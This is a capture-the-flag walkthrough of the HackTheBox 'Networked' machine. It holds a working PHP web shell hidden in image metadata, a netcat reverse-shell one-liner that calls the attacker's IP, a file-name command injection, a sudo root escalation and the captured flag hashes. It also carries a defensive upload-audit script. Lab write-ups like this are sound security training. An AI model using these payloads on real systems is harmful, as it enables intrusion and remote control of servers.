
HackTheBox Networked


In this article we are going to walk through the Networked machine on the HackTheBox platform.

 

Nmap:

  • 80/tcp
  • 22/tcp

User Part

  • there are two open ports, 80 and 22; let's first check port 80
  • in the source code there are 3 PHP pages not linked from the home page

– we can run gobuster to find these pages

$> gobuster dir -u http://10.10.10.146/ -w /usr/share/wordlists/dirb/common.txt -x php

 

– we see /backup, where there's backup.tar; let's download it and decompress it

$> tar -xvf backup.tar

 

– we have 2 interesting PHP files

* photos.php < to see the images

* upload.php < to upload an image

* let’s try to upload a shell

– there's a whitelist of valid extensions

$validext = array('.jpg', '.png', '.gif', '.jpeg');

– this link is very helpful

* https://github.com/xapax/security/blob/master/bypass_image_upload.md

– I use the exiftool technique

– let's take a jpg image and insert PHP code into it to get a web shell

1: exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' jpg.jpg

2: mv jpg.jpg shell.php.jpg

– let's try to upload it

– open the image location and append ?cmd=ls

 

http://10.10.10.146/uploads/10_10_14_29.php.jpg?cmd=ls


– now let's grab a reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.29 9091 >/tmp/f

– change the IP and port, and encode & as %26 (URL encoding)

– after getting the reverse shell, there are two interesting files in the guly user's home

* check_attack.php

* crontab.sh

 

In check_attack.php, the code gets all files in /var/www/html/uploads and removes them with exec(), so we can give a file in uploads a name that performs command injection:

; nc IP PORT -c bash

 

NOTE: -e /bin/bash will not work, we need to use -c bash

 

 

– create a file in /var/www/html/uploads/

$> touch "; nc 10.10.14.29 9090 -c bash"

– run nc on the attack machine

– wait 3 min or less.

– a shell opens as guly, in /home/guly

user.txt : 526cfc2305f17faaacecf212c57d71c5
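
A defender-side check for the two tricks used above (the `.php.jpg` upload carrying PHP in the image comment, and the uploads file name that ends up inside exec()), as an added example that is not part of the original writeup or the machine's code. The function name `audit_upload`, the finding labels and the sample files are constructed for illustration.

```python
import re

# The whitelist quoted from the backup source on this page.
IMAGE_EXTS = {".jpg", ".png", ".gif", ".jpeg"}
# Extensions a web server may hand to PHP (assumption: adjust to your handler config).
PHP_EXTS = {".php", ".phtml", ".phar", ".php5"}
# Allowlist for stored names: anything else can alter a shell command line.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")
# PHP open tags ("<?php" and the short echo tag "<?=") anywhere in the bytes.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def audit_upload(name: str, content: bytes) -> list[str]:
    """Return the reasons a stored upload should be quarantined (empty = clean)."""
    findings = []
    # Every dot-separated segment after the first counts as an extension.
    suffixes = ["." + part for part in name.lower().split(".")[1:]]
    if not suffixes or suffixes[-1] not in IMAGE_EXTS:
        findings.append("bad-extension")
    # shell.php.jpg passes a last-extension check but still contains ".php".
    if any(s in PHP_EXTS for s in suffixes[:-1]):
        findings.append("inner-php-extension")
    # Names with spaces, ';' and similar are dangerous once spliced into exec().
    if not SAFE_NAME.fullmatch(name):
        findings.append("unsafe-name")
    # Image metadata (for example a JPEG comment) can carry PHP code.
    if PHP_TAG.search(content):
        findings.append("php-tag-in-content")
    return findings


# Constructed samples: (file name, file bytes). None are real captures.
SAMPLES = [
    ("10_10_14_29.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ("10_10_14_29.php.jpg", b"\xff\xd8\xff\xfe\x00\x12<?php echo 1; ?>\xff\xd9"),
    ("; echo injected", b""),
]

if __name__ == "__main__":
    for sample_name, sample_bytes in SAMPLES:
        print(repr(sample_name), audit_upload(sample_name, sample_bytes))
```

The root fixes remain server-side: store uploads under a generated name, and pass file names to the cleanup job as arguments rather than through a shell string.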

Root Part

– looking around the system

$> ps aux | grep root

$> netstat -nutlp

$> find / -perm -u=s -type f 2>/dev/null

– see what the user can run

$> find / -executable -type f 2>/dev/null

$> sudo -l

The script (changename.sh) takes the values from input, creates a network interface file and then uses ifup. With its regex, the input needs a space, so if we provide bash /bin/sh it will run sh and give a root shell.

$> sudo -u root /usr/local/sbin/changename.sh

– fill all inputs with: bash /bin/sh

 

root.txt: 0a8ecda83f1d81251099e8ac3d0dcb82
